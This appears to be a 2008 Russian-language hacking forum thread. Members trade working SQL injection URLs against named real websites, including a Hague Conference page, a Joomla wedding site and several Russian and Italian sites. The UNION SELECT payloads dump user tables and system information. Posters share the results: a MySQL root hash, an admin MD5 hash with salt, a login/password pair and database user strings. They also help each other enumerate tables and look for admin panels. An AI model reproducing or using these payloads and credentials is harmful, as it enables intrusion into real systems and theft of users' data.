 |
|
23.08.2008, 05:04
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Китайский банннер-эксчендж
login:mintruder pass:django1'
http://www.banner4banner.ch/view.php?e=1&t=_blank&c=i&b=-1+union+select+1,2,concat(username,0x3a3a,password ),4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,20/*
в 0 лимите лежит админ, но не брутится сволота... =)
|
|
|
23.08.2008, 09:49
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
Сообщение от softrix
А какой запрос для просмотра баз данных, если не секрет?
-1+union+select+111,222,333,table_schema,555,666+fr om+information_schema.tables+where+table_name=0x75 73657273
|
|
|
|
23.08.2008, 14:34
|
|
Познающий
Регистрация: 13.04.2008
Сообщений: 42
С нами:
9513970
Репутация:
35
|
|
Код:
http://www.nofollow.ru/?page=articles&artcat=23&artid=1955+union+select+1,2,concat(username,0x3a3a,password),3,5,6+from+user/*
Админка: http://www.nofollow.ru/_admin_
Но видимо там .htpassword или как там его  |
|
|
|
23.08.2008, 15:11
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами:
10160966
Репутация:
1719
|
|
Код:
http://bukvoed.ru/index.php?page=freec&act=reada&qid=4386+and+4386=-1+union+select+1,2,3,concat(fio,0x3a,email,0x3a,pwd),5+from+be_users/*
фио-мыло-пасс
странная у них система юзеров :/ |
|
|
|
23.08.2008, 19:07
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами:
9806786
Репутация:
869
|
|
Код:
http://www.asud.net/Iniziative/iniziativa.php?in=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
4.1.22-standard-log:asud_net_2007_cv:GDM925_claudio@81.88.49.12
3
4
7
|
|
|
|
23.08.2008, 19:30
|
|
Новичок
Регистрация: 05.07.2008
Сообщений: 16
С нами:
9395645
Репутация:
7
|
|
Подсобите в админку попасть ?
http://www.emirate.ru/cgi-bin/full_details.cgi?&id_tourist=21852&country=oae&id=-148+union+select+1,2,3,4,5,6,7,concat_ws(%27:%27,i d,name,password,status),9,10,11,12,13+from+_2.main _users--
Разрешено чтение файлов, но прочесть кроме /etc/passwd ниче не смог,
разрешена запись, но не найти директорию.
Есть пароли но ХЗ где админка !
такая вот тема  |
|
|
|
24.08.2008, 00:57
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
С нами:
10260776
Репутация:
185
|
|
Сообщение от softrix
Подсобите в админку попасть ?
http://www.emirate.ru/cgi-bin/full_details.cgi?&id_tourist=21852&country=oae&id=-148+union+select+1,2,3,4,5,6,7,concat_ws(%27:%27,i d,name,password,status),9,10,11,12,13+from+_2.main _users--
Разрешено чтение файлов, но прочесть кроме /etc/passwd ниче не смог,
разрешена запись, но не найти директорию.
Есть пароли но ХЗ где админка !
такая вот тема Там может и не быть админки конкретно у этого сайта. Я так понимаю что база к которой он привязан общается еще с десятком сайтов. Или же просто криворукий одмин навставлял 10000000 движков таблиц и всякой такой хрени, потому как там оч много баз и таблиц...
Код:
http://www.emirate.ru/subscribe.php?&sub=-25+uni on+selec t+1,table_name,3+from+information_schema.tables/* - Это для таблиц
http://www.emirate.ru/subscribe.php?&sub=-25+uni on+sele ct+1,table_schema,3+from+information_schema.tables/* - Это для имен Баз
Вот те линк на таблицы, дальше раскручивай сам, если есть желание.
Там даж вордпресс стоит =)
Код:
http://www.emirate.ru/subscribe.php?&s ub=-25+union+select+1,option_na me,option_value+from+wordpress.wp_options/*
_http://smart-journeys.com
Кароч если подрочить, можешь много всякого там накрутить)))
Удачи. Если че интересного найдешь отпишись. Интересно. а самому ковырять времени нету)
|
|
|
|
24.08.2008, 11:10
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
С нами:
9336002
Репутация:
204
|
|
Код:
http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-41+union+select+1,2,unhex(hex(version())),4/*
Версия 4,но мне повезло
Код:
http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-41+union+select+unhex(hex(password)),2,unhex(hex(user)),4+from+mysql.user/*
root: 066bc62049564980 |
|
|
|
24.08.2008, 11:11
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами:
9420866
Репутация:
228
|
|
Пополним коллекцию:
http://www.svadba.tu2.ru/
Код:
http://www.svadba.tu2.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user,0x3a,database())--
version() - 5.0.51a
user() - logsvadba6@localhost
database() - logsvadba6
Достаем хэш админа:
Код:
http://www.svadba.tu2.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password,0x3a,usertype)+from+jos_users--
username : pass(md5) : salt
admin : 589ffec19b0ce895974aec9a5425e603 : S6L9oPNyOuyrzK9d |
|
|
|
24.08.2008, 11:19
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами:
9806786
Репутация:
869
|
|
Код:
http://www.unioneconsulenti.it/article.php?sid=1%20UNION%20SELECT%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9/*
Код:
5.0.32-Debian_7etch1-log:unioneconsulenti:userconsulenti@localhost
Код:
http://www.ipodhacks.com/article.php?sid=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11/*
Код:
4.0.27-standard:ipodhack_mains
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
